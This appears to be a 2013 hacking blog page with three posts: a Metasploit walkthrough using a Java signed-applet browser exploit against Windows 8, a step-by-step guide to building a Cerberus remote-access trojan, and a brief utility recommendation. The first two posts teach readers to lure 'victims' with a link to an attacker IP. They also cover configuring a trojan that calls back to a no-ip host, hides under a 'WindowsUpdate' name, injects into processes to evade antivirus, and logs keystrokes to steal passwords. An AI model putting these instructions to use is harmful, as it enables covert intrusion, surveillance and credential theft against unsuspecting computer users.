Sunday, 23 June 2013

[TUT]Hacking Windows 8 with Metasploit

Hlo cybersucks viewers, last week our blog cybersucks.blogspot.com reaches on 1 lakh views. I am feeling very excited about our success. So on our 1 lakh views of blog , I am writing a special post for my visitors.

Today I am gonna show you how to hack windows 8 using metasploit. As you all know metasploit is pre-installed in Backtrack, so I will be using backtrack 5 in my tutorial. You can also use Kali linux and other pentesting OS's also.

So lets start..

Things you will need ---->

1. Metasploit
2. Victim virtual machine running windows 8(Use Virtual box or virtual machine).
3. Brain.

Now I will show to how to exploit win 8, just follow the steps given below ----->

1. Open metasploit in backtrack using command in terminal "msfconsole".

2. After metasploit open type this command in terminal
use multi/browser/java_signed_applet
3. Now type
set SRVPORT 8080
   Here 8080 is port which will be used metasploit to connect victim machine.

4. Now type 
set URIPATH /
   Here you can use any uripath like /cybersucks , /facebook etc.

5. Now type 
Exploit
   Like in the pic given below.
6. Now send your Ip address to victim like 188.234.244.214:8080/

7. Now when our victim will open this link given by us he/she will be promoted with a java pop out and when he/she will click Run button of that pop up the victim comuter will be successfully exploited. Like in picture given below.
      
Note -->
1. This exploit only works when victim has installed Java.
2. This tutorial only for educational purpose.

Monday, 17 June 2013

How to create a TROJAN and hack into anyone's computer.


This tutorial will teach you how to use a R.A.T. & How to get them started. Many people get confused on how to use them.


Requirements:
Download Cerberus 1.03.4 Beta.: 
Imagehttp://www.mediafire.com/?mtmzut0lygj


Step 1.)

Browse to the Cerberus folder, and run Cerberus.exe as shown.
Image

Step 2.)

The client window will be displayed. This is the main window which would be displaying a list of connections and their info, had you actually any victims online. Of course at the moment, it is empty. But when you do have victims, you would right-click on their name/icon to bring up a pop-up menu which would provide you with the option to do all sorts of fun stuff.
Zoom in (real dimensions: 974 x 453)

Step 3.)

Click on the Options button at the lower left corner of the window. This brings up Program Options. You can choose to leave the password as it is, or make a new one.
Image

You have the option to enter 3 ports to listen to. If you don't know how to port forward ports, go search for a tutorial on port forwarding. Once you have your desired ports properly forwarded, enter them (a maximum of 3) into these fields. As you can see, I left the first field default (5150) and then set the second to my preferred port (8245). No, this number doesn't have a whole lot of meaning. Just make sure it is forwarded. Now click Save, and click on Options again. If you just advance to the next radio button, your changes might not be saved.

Step 4.)


Skip down to the last radio button. (NOTE: If you have the No-IP DUC running, you can skip this step.)

In the username box, enter the email address you used to sign up at http://www.no-ip.com. If you don't have an IP registered there, go search for a tutorial on making a no-ip address then come back here once you have your account.
In the password box, enter the password you used at http://www.no-ip.com.



Zoom in (real dimensions: 978 x 452)Image


Click Update, Save, then Exit.

Step 5.)


Click the New button at the lower left, near the Options button.
This is where you start the creation of your server that you want your victims to click on.

Click the Basic Options button.
Zoom in (real dimensions: 973 x 442)Image

Where I have entered kaidzaccount.no-ip.biz, you would replace with your own no-ip address that you registered that http://www.no-ip.com.
Click the + button to add it to the Address Book. This is the address your server will try to connect to (destination: YOU). The password must be the same used in Step (E). Connection port must be a properly forwarded port, and one of the possible 3 ports that your Cerberus client will be listening to.

Step 7.)

Click the Server Installation radio button.
Set your options as I have. They don't need to be exact, except for the fact that Install Server must be checked.

The directory installation isn't very important, nor are the exact names you choose, but I would suggest you choose any directory besides Temporary Directory.
Image


Step 8.)

Select the Boot Methods radio button. This is where you will configure how your server is started whenever their PC is restarted.
Set your options as mine (you can change 'WindowsUpdate' to what ever you want) and click the + button after Active Setup a few times.
Zoom in (real dimensions: 978 x 452)Image

Step 9.)

This is where you bind a file of your choice to be run whenever your server is clicked on. If you aren't interested in binding a file to your server, skip this step.
Zoom in (real dimensions: 978 x 452)Image


Click the ... button after file to select a file to be bound inside your server.

In most circumstances, if the file is something the user actually wants, you would set Execution to Shell Execute (Normal). However, if you don't want any signs of this second added file being visible to the victim, set it to Shell Execute (Hidden). Setting the Destination to anything other than Temporary Directory is preferable. Make sure that a check-box is checked besides each file you want included in the server.
Zoom in (real dimensions: 978 x 452)Image


Here are some miscellaneous options. I would recommend checking Keylogger Active, so it is easier for you to steal passwords as your victim logs-in to websites.

Check Inject into Default Browser or select Process if you want your server to attempt to hide itself inside a running instance of the user-defined process ( I typed explorer, but if I wanted to inject into the Windows Explorer process I'm pretty sure that I should have typed Explorer.exe instead), and if it fails, it then injects itself into the victim's default browser. Among other things, this aids in preventing your server from being removed by an Anti-Virus program. Nothing is certain though, of course.

The Mutex is any value which uniquely identifies this certain build of your server. If another server with the same Mutex attempts to start, it will cancel because the same server will already be running. You can set the Mutex to whatever you like, or leave it alone.

Step 10.)

Under the Create Server page ( you can ignore Display Message, Blacklist, and Overview as they aren't really relevant to this tutorial ), pick a name for your server (which of course you can rename whenever), and select its icon. If the icon you want isn't in the Cerberus\Icons directory, then it won't be available for selection from the Icons List. To select a different icon, click on the icon image itself to load another. Of course, Use icon must be checked.
Zoom in (real dimensions: 978 x 452)Image


Compact Server with UPX indicates that you want your server to be compressed (in other words, reduced in file size) by the UPX freeware executable compressor. Optional.

Under the File Extension drop down menu, you must select either Application (*.exe) or Screen Saver (*.scr) if you want your selected icon to be displayed.

When you are done, click Create Server.

The following window will pop-up:
Zoom in (real dimensions: 978 x 452)Image


A description of what this means is beyond the scope of this tutorial (actually, I'm just too lazy to explain it) so you can go ahead and click No.

Another dialog will inform you that your server was created, and where it is located (usually in the Cerberus folder). You now have your server!
Zoom in (real dimensions: 978 x 452)Image

Now, it is time to test it. One way of doing this is to run it on a spare computer that has access to the internet; in my case, I just run the server myself, and if all goes as expected, my Cerberus will play this beast growling sound, and show a little balloon over it's taskbar icon, indicating that you have obtained a connection to a new victim!

That's it.

Sunday, 16 June 2013

Everything - Find your file in 2 seconds!


Want something better than that silly sluggish windows search tool which takes hours to find your files/folders?
Download 'Everything' by Void Tools - Which will find your file within 3 seconds!
Please donate if possible.